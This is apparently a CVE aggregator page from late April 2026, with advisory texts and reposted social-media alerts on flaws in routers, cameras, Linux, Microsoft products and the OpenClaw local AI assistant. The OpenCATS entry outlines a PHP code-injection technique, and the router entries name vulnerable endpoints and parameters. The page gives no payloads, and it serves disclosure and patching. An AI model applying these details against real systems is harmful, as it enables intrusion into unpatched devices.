The vulnerability in question is CVE-2026-25874 (CVSS score: 9.3), which has been described as a case of untrusted data deserialization stemming from the use of the unsafe pickle format. https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html

##

CVE-2026-41602
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T18:40:25.530000

1 posts

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41602/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7320
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-28T18:31:36

1 posts

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7320/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42432(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-04-28T18:30:39

1 posts

## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement. A previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service bounda

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42432/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42431(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:30:21

1 posts

## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard. node.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affecte

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42431/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42422(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:28:01

1 posts

## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing. Device token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Pa

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42422/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41914(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:26:36

1 posts

## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - A

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41914/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41396(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-04-28T18:21:31

1 posts

## Summary Workspace `.env` can override the bundled plugin trust root ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break. ## Affected Packages / Versions -

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41396/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41394(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-28T18:20:50

1 posts

## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still gives auth:"plugin" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes. ## Affected Packages / Versions -

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41394/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41387
(9.7 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T18:18:46

1 posts

## Summary Host exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior. ## Impact An approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content. ## Affected Component `src/infra/host-env-sec

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41387/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41384(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-04-28T18:17:40

1 posts

## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published. ## Affecte

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41384/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:17:19

1 posts

## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations. ## Impact If an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41383/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41378(CVSS UNKNOWN)

EPSS: 0.18%

updated 2026-04-28T18:15:32

1 posts

## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41378/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27760
(8.1 HIGH)

EPSS: 0.10%

updated 2026-04-28T15:30:58

1 posts

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that pers

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27760/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7289
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T15:30:58

1 posts

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7289/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7279
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T12:31:36

1 posts

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads the DLL.

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7279/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3323
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-28T12:31:36

1 posts

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3323/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35431
(10.0 CRITICAL)

EPSS: 0.09%

updated 2026-04-28T12:10:53.103000

1 posts

Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.

beyondmachines1@infosec.exchange at 2026-04-28T16:01:29.000Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-cvss-10-0-ssrf-vulnerability-in-entra-id-c-d-3-y-z/gD2P6Ple2L

##

CVE-2026-7243
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument maxRtrAdvInterval leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

offseq@infosec.exchange at 2026-04-28T12:30:30.000Z ##

🚨 CVE-2026-7243: Critical OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Remote, unauthenticated RCE risk — public exploit out, no patch yet. Lock down management access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7243-os-command-injection-in-totolink-a80-73a189fb #OffSeq #Vulnerability #RouterSecurity

##

CVE-2026-32644
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T03:31:36

2 posts

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

offseq@infosec.exchange at 2026-04-28T06:30:26.000Z ##

CVE-2026-32644 (CRITICAL, CVSS 9.2): Milesight MS-Cxx63-PD cameras have default SSL private keys, exposing encrypted traffic to interception & tampering. No patch yet — restrict access & follow vendor updates. https://radar.offseq.com/threat/cve-2026-32644-cwe-321-in-milesight-ms-cxx63-pd-60e79b90 #OffSeq #IoTSecurity #Vulnerability

##

thehackerwire@mastodon.social at 2026-04-28T02:07:24.000Z ##

🔴 CVE-2026-32644 - Critical (9.8)

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-32644/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7202
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

2 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T05:00:28.000Z ##

🛑 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7202). Public exploit available. Restrict remote access & disable WPS until patched! https://radar.offseq.com/threat/cve-2026-7202-os-command-injection-in-totolink-a80-9229772f #OffSeq #IoTSecurity #vulnerability #CVE20267202

##

thehackerwire@mastodon.social at 2026-04-28T01:43:42.000Z ##

🔴 CVE-2026-7202 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injec...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7202/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7203
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

2 posts

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injection. The attack can be launched remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T03:30:33.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) suffers from OS command injection (CVE-2026-7203). Remote, unauthenticated attackers can fully compromise affected routers. No patch confirmed — disable remote mgmt & isolate. https://radar.offseq.com/threat/cve-2026-7203-os-command-injection-in-totolink-a80-b3a02d32 #OffSeq #Vuln #IoTSec

##

thehackerwire@mastodon.social at 2026-04-28T01:43:52.000Z ##

🔴 CVE-2026-7203 - Critical (9.8)

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os comma...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7203/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20766
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T03:31:36

1 posts

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

thehackerwire@mastodon.social at 2026-04-28T02:07:15.000Z ##

🟠 CVE-2026-20766 - High (8.8)

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-20766/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7204
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

3 posts

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

offseq@infosec.exchange at 2026-04-28T02:00:30.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) affected by CVE-2026-7204 — remote OS command injection in CGI handler. No patch yet. Restrict access & monitor for updates. Public exploit disclosed. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vulnerability #IoTSecurity #CVE20267204

##

thehackerwire@mastodon.social at 2026-04-28T01:44:02.000Z ##

🔴 CVE-2026-7204 - Critical (9.8)

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command inje...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7204/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-28T01:30:29.000Z ##

🚨 CRITICAL: Totolink A8000RU routers (7.1cu.643_b20200521) vulnerable to remote, unauthenticated OS command injection (CVE-2026-7204). No patch yet. Restrict access & monitor vendor channels. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vuln #RouterSecurity #CVE20267204

##

CVE-2026-40972
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-28T00:31:47

1 posts

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading changed classes, thereby achieving remote code execution in the remote application. Affected: Spring Boot 4.0.0–4.0.5 (fix 4.0.6), 3.5.0–3.5.13 (fix 3.5.14),

thehackerwire@mastodon.social at 2026-04-28T01:00:06.000Z ##

🟠 CVE-2026-40972 - High (7.5)

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading chang...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40972/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31649
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T21:31:56

1 posts

In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix integer underflow in chain mode The jumbo_frm() chain-mode implementation unconditionally computes len = nopaged_len - bmax; where nopaged_len = skb_headlen(skb) (linear bytes only) and bmax is BUF_SIZE_8KiB or BUF_SIZE_2KiB. However, the caller stmmac_xmit() decides to invoke jumbo_frm() based on skb->le

thehackerwire@mastodon.social at 2026-04-28T03:00:11.000Z ##

🔴 CVE-2026-31649 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

net: stmmac: fix integer underflow in chain mode

The jumbo_frm() chain-mode implementation unconditionally computes

len = nopaged_len - bmax;

where nopaged_len = skb_headl...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31649/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31656
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat A use-after-free / refcount underflow is possible when the heartbeat worker and intel_engine_park_heartbeat() race to release the same engine->heartbeat.systole request. The heartbeat worker reads engine->heartbeat.systole and calls i915_request_put() on it when

thehackerwire@mastodon.social at 2026-04-28T01:11:29.000Z ##

🟠 CVE-2026-31656 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat

A use-after-free / refcount underflow is possible when the heartbeat
worker and intel_engine_park_heartbeat() ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31656/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31669
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-04-27T21:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: mptcp: fix slab-use-after-free in __inet_lookup_established The ehash table lookups are lockless and rely on SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability during RCU read-side critical sections. Both tcp_prot and tcpv6_prot have their slab caches created with this flag via proto_register(). However, MPTCP's mptcp_su

thehackerwire@mastodon.social at 2026-04-28T01:11:18.000Z ##

🔴 CVE-2026-31669 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

mptcp: fix slab-use-after-free in __inet_lookup_established

The ehash table lookups are lockless and rely on
SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability
during RCU...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31669/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31650
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:30:50

1 posts

In the Linux kernel, the following vulnerability has been resolved: mmc: vub300: fix use-after-free on disconnect The vub300 driver maintains an explicit reference count for the controller and its driver data and the last reference can in theory be dropped after the driver has been unbound. This specifically means that the controller allocation must not be device managed as that can lead to use

thehackerwire@mastodon.social at 2026-04-28T03:00:21.000Z ##

🟠 CVE-2026-31650 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mmc: vub300: fix use-after-free on disconnect

The vub300 driver maintains an explicit reference count for the
controller and its driver data and the last reference can in theory...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31650/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31662
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-27T20:17:55.973000

1 posts

In the Linux kernel, the following vulnerability has been resolved: tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements bc_ackers on every inbound group ACK, even when the same member has already acknowledged the current broadcast round. Because bc_ackers is a u16, a duplicate ACK received after the last legitimate ACK wr

thehackerwire@mastodon.social at 2026-04-28T02:22:57.000Z ##

🟠 CVE-2026-31662 - High (7.5)

In the Linux kernel, the following vulnerability has been resolved:

tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG

The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements
bc_ackers on every inbound group ACK, even when the...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31662/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31657
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-27T20:16:58.960000

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: hold claim backbone gateways by reference batadv_bla_add_claim() can replace claim->backbone_gw and drop the old gateway's last reference while readers still follow the pointer. The netlink claim dump path dereferences claim->backbone_gw->orig and takes claim->backbone_gw->crc_lock without pinning the underlying bac

thehackerwire@mastodon.social at 2026-04-28T01:11:39.000Z ##

🔴 CVE-2026-31657 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: hold claim backbone gateways by reference

batadv_bla_add_claim() can replace claim->backbone_gw and drop the old
gateway's last reference while readers still follow ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31657/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31652
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:16:12.663000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm/damon/stat: deallocate damon_call() failure leaking damon_ctx damon_stat_start() always allocates the module's damon_ctx object (damon_stat_context). Meanwhile, if damon_call() in the function fails, the damon_ctx object is not deallocated. Hence, if the damon_call() is failed, and the user writes Y to “enabled” again, the

thehackerwire@mastodon.social at 2026-04-28T03:07:56.000Z ##

🟠 CVE-2026-31652 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm/damon/stat: deallocate damon_call() failure leaking damon_ctx

damon_stat_start() always allocates the module's damon_ctx object
(damon_stat_context). Meanwhile, if damon_cal...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31652/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31648
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:13:14.333000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm: filemap: fix nr_pages calculation overflow in filemap_map_pages() When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I encountered some very strange crash issues showing up as "Bad page state": " [ 734.496287] BUG: Bad page state in process stress-ng-env pfn:415735fb [ 734.496427] page: refcount:0 mapcount:

thehackerwire@mastodon.social at 2026-04-28T03:00:01.000Z ##

🟠 CVE-2026-31648 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm: filemap: fix nr_pages calculation overflow in filemap_map_pages()

When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I
encountered some very strange crash issu...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31648/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31668
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T20:08:54.307000

1 posts

In the Linux kernel, the following vulnerability has been resolved: seg6: separate dst_cache for input and output paths in seg6 lwtunnel The seg6 lwtunnel uses a single dst_cache per encap route, shared between seg6_input_core() and seg6_output_core(). These two paths can perform the post-encap SID lookup in different routing contexts (e.g., ip rules matching on the ingress interface, or VRF tab

thehackerwire@mastodon.social at 2026-04-28T01:01:12.000Z ##

🔴 CVE-2026-31668 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

seg6: separate dst_cache for input and output paths in seg6 lwtunnel

The seg6 lwtunnel uses a single dst_cache per encap route, shared
between seg6_input_core() and seg6_output_...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31668/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40372
(9.1 CRITICAL)

EPSS: 0.02%

updated 2026-04-27T19:57:39.360000

2 posts

Improper verification of cryptographic signature in ASP.NET Core allows an unauthorized attacker to elevate privileges over a network.

adulau@infosec.exchange at 2026-04-28T05:41:08.000Z ##

The diversity of advisory is key. Look at how good the advisory of GitHub is compared to the others.

https://db.gcve.eu/vuln/cve-2026-40372

#cve #vulnerability #vulnerabilitymanagement

##

hackmag@infosec.exchange at 2026-04-28T04:30:02.000Z ##

⚪️ Microsoft Issues Emergency Patch for Critical ASP.NET Vulnerability

🗨️ Microsoft has released an out-of-band update for ASP.NET Core. The patch fixes a critical vulnerability in the Data Protection cryptographic APIs that allowed unauthenticated attackers to obtain SYSTEM privileges by forging authentication cookies. The vulnerability is tracked as CVE-2026-40372 and…

🔗 https://hackmag.com/news/asp-net-patch?utm_source=mastodon&utm_medium=social&utm_campaign=repost_hackmag_to_socials

#news

##

CVE-2026-33454
(9.4 CRITICAL)

EPSS: 0.16%

updated 2026-04-27T18:32:06

1 posts

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\")

Matchbook3469@mastodon.social at 2026-04-29T16:15:06.000Z ##

🔴 New security advisory:

CVE-2026-33454 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
